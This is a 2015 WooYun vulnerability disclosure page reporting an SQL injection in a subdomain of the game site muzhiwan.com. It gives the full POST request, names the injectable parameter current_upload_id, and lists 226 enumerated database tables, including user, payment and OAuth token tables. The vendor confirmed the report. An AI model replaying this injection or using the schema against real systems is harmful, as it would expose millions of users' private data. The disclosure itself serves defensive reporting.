当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148779

漏洞标题:拇指玩某分站存在SQL注入漏洞(涉及千万用户)

相关厂商:muzhiwan.com

漏洞作者: 路人甲

提交时间:2015-10-23 09:01

修复时间:2015-12-07 15:38

公开时间:2015-12-07 15:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

详细说明:

POST /?action=game&navTabId=create_new_game&opt=addSave HTTP/1.1
Content-Length: 624
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://open.muzhiwan.com:80/
Cookie: PHPSESSID=sughd79go0e42smscfhl6pjpq7
Host: open.muzhiwan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
agencyimg=&agencyimg_file=%e4%b8%8a%e4%bc%a0%e7%8b%ac%e4%bb%a3%e6%8e%88%e6%9d%83%e4%b9%a6&copyrightimg=&copyrightimg_file=&cover=&cover_file=&current_upload_id=1&date=01/01/1967&descript=1&exit=&gametype=1&gname=njpbaqht&hezuo=334&icon=&icon512=&icon512_file=&icon_file=&isself=0&qudao=%e7%94%b5%e4%bf%a1&remark=1&sdate=%e5%a4%a7%e6%a6%82%e6%97%b6%e9%97%b4%ef%bc%8c%e5%a6%82%ef%bc%9a%e4%b8%83%e6%9c%88%e5%88%9d&selecttest1=2&serviceTel=555-666-0606&shot%5b%5d=&shot_file_add1=&tid=31&video=1

注入点:current_upload_id

11.png

25个库:

333.png

555.jpg

Database: mzw
[226 tables]
+--------------------------------+
| group                          |
| mzw_users-1                    |
| auth                           |
| auth_group                     |
| auth_group_relation            |
| auth_usergroup                 |
| group_apply                    |
| group_glance                   |
| group_identity                 |
| group_interior                 |
| group_member                   |
| group_member_log               |
| group_recommend                |
| group_report                   |
| group_score                    |
| group_score_list               |
| group_topic                    |
| group_topic_content            |
| group_topic_love               |
| lanxun_url                     |
| market_model_info              |
| models                         |
| mwz_sdk_user_reg_log           |
| mzw_ad                         |
| mzw_ad_p                       |
| mzw_admin                      |
| mzw_admin_editlog              |
| mzw_admin_gameeditlog          |
| mzw_admin_group                |
| mzw_bbs_topic                  |
| mzw_blacklist                  |
| mzw_c_ad                       |
| mzw_c_admin                    |
| mzw_c_channel                  |
| mzw_c_game                     |
| mzw_c_game_detail              |
| mzw_c_game_down                |
| mzw_c_game_snapshot            |
| mzw_c_hotsearch                |
| mzw_c_uc_mapping               |
| mzw_censorword                 |
| mzw_content_from               |
| mzw_cp_bill                    |
| mzw_cp_contact                 |
| mzw_cp_fee_ratio               |
| mzw_cp_game                    |
| mzw_cp_game_1                  |
| mzw_cp_game_append             |
| mzw_cp_game_gift               |
| mzw_cp_game_gift_code          |
| mzw_cp_game_sdk                |
| mzw_cp_game_v                  |
| mzw_cp_game_v_article          |
| mzw_cp_game_v_img              |
| mzw_cp_game_v_motion           |
| mzw_cp_member                  |
| mzw_cp_msg                     |
| mzw_cp_notice                  |
| mzw_cp_order                   |
| mzw_cp_pay                     |
| mzw_cp_sdk                     |
| mzw_cp_testfee                 |
| mzw_cp_testin                  |
| mzw_cp_user                    |
| mzw_cp_users_resetpwd          |
| mzw_crack_wishing              |
| mzw_crontab_game               |
| mzw_dabaoprogress              |
| mzw_datacopypath               |
| mzw_day_gamecount              |
| mzw_exam_score                 |
| mzw_exam_title                 |
| mzw_favorite                   |
| mzw_feedback                   |
| mzw_feedback_app               |
| mzw_feeds                      |
| mzw_fetch_html                 |
| mzw_friend_links               |
| mzw_game                       |
| mzw_game_album                 |
| mzw_game_album_comment         |
| mzw_game_album_comment_reply   |
| mzw_game_album_contents        |
| mzw_game_article               |
| mzw_game_article_auth          |
| mzw_game_article_comment       |
| mzw_game_article_comment_reply |
| mzw_game_article_detail        |
| mzw_game_article_detail_copy   |
| mzw_game_article_type          |
| mzw_game_article_vote          |
| mzw_game_black                 |
| mzw_game_device_package        |
| mzw_game_extend                |
| mzw_game_firm                  |
| mzw_game_firm_comment          |
| mzw_game_firm_comment_reply    |
| mzw_game_google                |
| mzw_game_img_webp              |
| mzw_game_net_forum             |
| mzw_game_net_gift              |
| mzw_game_net_giftbind          |
| mzw_game_net_giftorder         |
| mzw_game_net_server            |
| mzw_game_open                  |
| mzw_game_search_tags           |
| mzw_game_search_tags_bind      |
| mzw_game_tags                  |
| mzw_game_tags_bind             |
| mzw_game_tags_type             |
| mzw_game_tmp                   |
| mzw_game_type                  |
| mzw_game_unzip                 |
| mzw_game_unzip_diff            |
| mzw_game_unzip_sub             |
| mzw_game_v                     |
| mzw_game_v_comment             |
| mzw_game_v_comment_reply       |
| mzw_game_v_cp                  |
| mzw_game_v_cps                 |
| mzw_game_v_detail              |
| mzw_game_v_diff                |
| mzw_game_v_downlist            |
| mzw_game_v_downlist_back       |
| mzw_game_v_downlist_copy       |
| mzw_game_v_downtop             |
| mzw_game_v_icon_temp           |
| mzw_game_v_img                 |
| mzw_game_v_img_copy            |
| mzw_game_v_img_temp            |
| mzw_game_v_video               |
| mzw_game_vblacklist            |
| mzw_game_vote                  |
| mzw_gift_bbs                   |
| mzw_gift_weixin                |
| mzw_gift_weixin_copy           |
| mzw_gift_weixin_copy1          |
| mzw_google_apps                |
| mzw_handle_brand               |
| mzw_handle_model               |
| mzw_hotword_tab                |
| mzw_log_ad_click_201302        |
| mzw_log_downloadgame_0         |
| mzw_log_goodarticle_0          |
| mzw_log_goodgame_0             |
| mzw_log_goodsavegame_2013      |
| mzw_log_login_201301           |
| mzw_log_sf_download_0          |
| mzw_mobile_brand               |
| mzw_mobile_cpubrand            |
| mzw_mobile_cpubrand_adp        |
| mzw_mobile_cpumodel            |
| mzw_mobile_forum               |
| mzw_mobile_manual_pwd          |
| mzw_mobile_model               |
| mzw_mobile_modelcode           |
| mzw_mobile_modelcode_rel       |
| mzw_mobile_verify_message      |
| mzw_models                     |
| mzw_our_company                |
| mzw_our_postinfo               |
| mzw_pay                        |
| mzw_pc_feedback                |
| mzw_phone_msg_log              |
| mzw_project                    |
| mzw_project_picture            |
| mzw_question                   |
| mzw_question_answer            |
| mzw_report_tab                 |
| mzw_save_game                  |
| mzw_save_game_blacklist        |
| mzw_save_game_category         |
| mzw_save_game_comment          |
| mzw_save_game_comment_reply    |
| mzw_save_game_for              |
| mzw_save_game_for_comment      |
| mzw_save_game_img              |
| mzw_save_game_send             |
| mzw_save_gamenotexistgame      |
| mzw_sdk_notice                 |
| mzw_sdk_oauth2_authcodes       |
| mzw_sdk_oauth2_clients         |
| mzw_sdk_oauth2_tokens          |
| mzw_sdk_pay_notifyrecord       |
| mzw_sdk_pay_orders             |
| mzw_sdk_pay_orders_info        |
| mzw_sdk_pay_yeepaytoken        |
| mzw_sdk_phone_msg_log          |
| mzw_short_url                  |
| mzw_short_url_key              |
| mzw_snoopy_game                |
| mzw_snoopy_gift                |
| mzw_u_test                     |
| mzw_update                     |
| mzw_user_anwer                 |
| mzw_user_game                  |
| mzw_user_gamev                 |
| mzw_user_gamevcomment          |
| mzw_user_gamevcomment_reply    |
| mzw_user_gamevdetail           |
| mzw_user_gamevdownlist         |
| mzw_user_gamevimg              |
| mzw_user_reg                   |
| mzw_userbehavior               |
| mzw_userdevice                 |
| mzw_userdevice_bind            |
| mzw_users                      |
| mzw_users_1                    |
| mzw_users_6                    |
| mzw_users_accesstoken          |
| mzw_users_origin               |
| mzw_users_phone                |
| mzw_users_photo_create         |
| mzw_users_profile              |
| mzw_users_resetpwd             |
| mzw_users_sign                 |
| mzw_weibo_score                |
| mzw_weixin_blacklist           |
| mzw_weixin_share               |
| mzw_weixin_user_info           |
| mzw_weixin_user_prize          |
| mzw_weixin_user_sign           |
| mzw_zhuanti_comment            |
| pre_ucenter_members_cpfrom502  |
| static_sdk_compatibility       |
| tmp_02                         |
+--------------------------------+

涉及988万用户数据:

777.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-23 15:36

厂商回复:

十分感谢,我们会及时修复

最新状态:

暂无